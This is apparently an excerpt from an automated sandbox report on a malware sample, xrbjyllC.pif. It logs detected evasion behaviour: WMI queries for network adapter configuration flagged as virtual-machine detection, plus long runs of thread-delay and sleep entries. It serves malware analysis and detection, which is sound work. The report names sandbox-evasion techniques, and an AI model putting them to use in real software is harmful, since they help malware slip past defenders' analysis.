                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifMemory allocated: 27F60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifMemory allocated: 29C90000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifMemory allocated: 29A90000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifMemory allocated: 24F10000 memory reserve | memory write watch
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifMemory allocated: 26F50000 memory reserve | memory write watch
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifMemory allocated: 26D70000 memory reserve | memory write watch
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifMemory allocated: 206D0000 memory reserve | memory write watch
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifMemory allocated: 22710000 memory reserve | memory write watch
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifMemory allocated: 22320000 memory reserve | memory write watch
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCode function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,9_2_004019F0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599438Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599313Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599203Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599094Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598969Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598860Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598735Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598610Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598485Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598360Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598222Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598068Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597946Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597844Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597719Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597485Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596981Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596875Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596767Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596640Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596528Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596416Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596304Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596188Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596050Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595938Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595810Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595698Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595585Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595249Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595123Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594911Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594789Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594677Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594564Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594439Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594313Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594177Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 593997Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 593860Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 593658Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 593506Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 593369Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 593196Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 593011Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 592620Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 592105Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 591918Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 591659Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 922337203685477
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 600000
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599891
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599781
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599672
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599562
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599453
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599344
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599234
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599124
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599007
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598891
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598780
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598422
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598297
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598172
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598062
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597953
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597844
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597719
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597609
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597500
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597391
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597281
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597172
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597062
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596953
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596844
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596734
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596625
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596515
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596406
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596297
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596187
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596078
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595932
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595813
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595700
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595579
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595466
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595344
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595234
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595125
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595016
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594906
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594797
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594687
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594578
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594469
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594344
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594234
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594125
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 922337203685477
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 600000
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599889
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599781
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599671
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599562
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599453
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599343
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599234
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599125
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 599015
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598906
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598796
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598686
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598578
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598461
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598310
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598185
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 598078
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597968
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597859
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597750
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597640
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597531
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597421
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597312
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597203
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 597093
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596981
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596875
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596765
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596656
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596546
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596437
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596328
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596218
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 596109
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595999
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595890
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595781
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595671
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595562
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595453
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595343
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595234
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595125
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 595015
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594891
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594765
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594656
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594546
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 594437
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWindow / User API: threadDelayed 2941Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWindow / User API: threadDelayed 6101Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWindow / User API: threadDelayed 1823
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWindow / User API: threadDelayed 8024
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWindow / User API: threadDelayed 7725
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWindow / User API: threadDelayed 2129
                  Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeEvasive API call chain: GetLocalTime,DecisionNodes
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep count: 34 > 30Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4144Thread sleep count: 2941 > 30Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -599875s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -599766s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4144Thread sleep count: 6101 > 30Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -599656s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -599547s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -599438s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -599313s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -599203s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -599094s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -598969s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -598860s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -598735s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -598610s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -598485s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -598360s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -598222s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -598068s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -597946s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -597844s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -597719s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -597610s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -597485s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -597360s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -597235s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -597110s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -596981s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -596875s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -596767s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -596640s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -596528s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -596416s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -596304s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -596188s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -596050s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -595938s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -595810s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -595698s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -595585s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -595249s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -595123s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -594911s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -594789s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -594677s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -594564s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -594439s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -594313s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -594177s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -593997s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -593860s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -593658s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -593506s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -593369s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -593196s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -593011s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -592620s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -592105s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -591918s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024Thread sleep time: -591659s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep count: 34 > 30
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -31359464925306218s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4312Thread sleep count: 1823 > 30
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4312Thread sleep count: 8024 > 30
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -599891s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -599781s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -599672s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -599562s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -599453s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -599344s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -599234s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -599124s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -599007s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -598891s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -598780s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -598422s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -598297s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -598172s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -598062s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -597953s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -597844s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -597719s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -597609s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -597500s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -597391s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -597281s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -597172s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -597062s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -596953s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -596844s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -596734s >= -30000s
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428Thread sleep time: -596625s >= -30000s
